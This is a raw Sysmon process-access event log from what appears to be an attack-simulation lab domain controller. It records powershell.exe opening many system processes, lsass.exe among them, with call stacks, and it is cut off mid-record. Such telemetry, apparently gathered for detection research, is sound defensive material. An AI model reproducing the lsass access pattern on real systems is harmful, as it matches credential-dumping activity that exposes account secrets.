15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-0F00-000000008801}1136C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001126Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-0D00-000000008801}1000C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001125Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001124Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1900-000000008801}2152C:\Windows\System32\RemoteFXvGPUDisablement.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001123Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1A00-000000008801}2164C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001122Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C62-5FA1-0B00-000000008801}868C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001121Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.597{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-0E00-000000008801}1080C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001120Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.566{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C64-5FA1-1100-000000008801}1204C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001119Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.566{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-2000-000000008801}2308C:\Windows\System32\dsregcmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001118Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.503{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-2300-000000008801}2436C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001117Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.503{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-2100-000000008801}2320C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001116Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.503{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-1F00-000000008801}2276C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001115Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.503{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-1C00-000000008801}2184C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001114Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.503{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-1B00-000000008801}2176C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001113Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.441{D28789B6-7C64-5FA1-1800-000000008801}21402860C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{D28789B6-7C65-5FA1-1E00-000000008801}2268C:\Windows\system32\compattelrunner.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+3364bd|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b3a5c|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b294b|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b2884|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\7e90080f26800b0f94f23eecd5dbab97\System.ni.dll+2b335c|UNKNOWN(00007FF8DDCB3F41) 10341000x80000000000000001112Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001111Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001110Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001109Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001108Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001107Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.300{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001106Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001105Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001104Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001103Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001102Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:06.285{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C68-5FA1-2400-000000008801}2880C:\Windows\system32\wbem\wmiprvse.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+